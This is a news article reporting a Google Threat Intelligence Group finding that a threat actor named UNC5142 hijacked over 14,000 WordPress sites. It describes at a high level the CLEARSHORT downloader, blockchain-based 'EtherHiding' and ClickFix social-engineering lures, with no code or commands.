More than 14,000 WordPress sites hacked, used to spread malware

WordPress is one of the most popular content management systems on the Internet. In fact, more than 43 percent of all websites run on WordPress. This makes the latest attack on WordPress sites by a new threat actor all the more concerning.

According to a new report from the Google Threat Intelligence Group (GTIG), a new malicious actor named UNC5142 has successfully hijacked WordPress sites and used a completely new technique to spread malware across the web. UNC5142, according to the report, would detect vulnerable WordPress websites often using faulty WordPress themes, plugins or databases.

Targeted WordPress sites are allegedly infected with a CLEARSHORT multi-step JavaScript downloader that distributes the malware. The threatening group would then deploy a new technique called “EtherHiding”, activated by CLEARSHORT.

Google describes EtherHiding as “a technique used to hide malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain.” This use of blockchain to spread malicious code is unique and makes stopping the spread of malware all the more difficult.

The smart contract containing the code on the blockchain would then call a CLEARSHORT landing page, often hosted on a Cloudflare developer page, which uses a ClickFix social engineering tactic. This tactic tricks the website visitor into executing malicious commands on their computer through Windows’ Run dialog box or Mac’s Terminal application.

UNC5142 attacks are often financially motivated, according to Google. GTIG claims to have been tracking UNC5142 since 2023. However, Google reports that UNC5142 suddenly stopped all activity in July 2025.

This could mean that this new group of threat actors, which have been successfully running their malware campaigns, have just decided to step aside. It could also mean that the threat actor has changed their techniques, successfully hiding their latest actions, and is continuing to hack vulnerable websites today.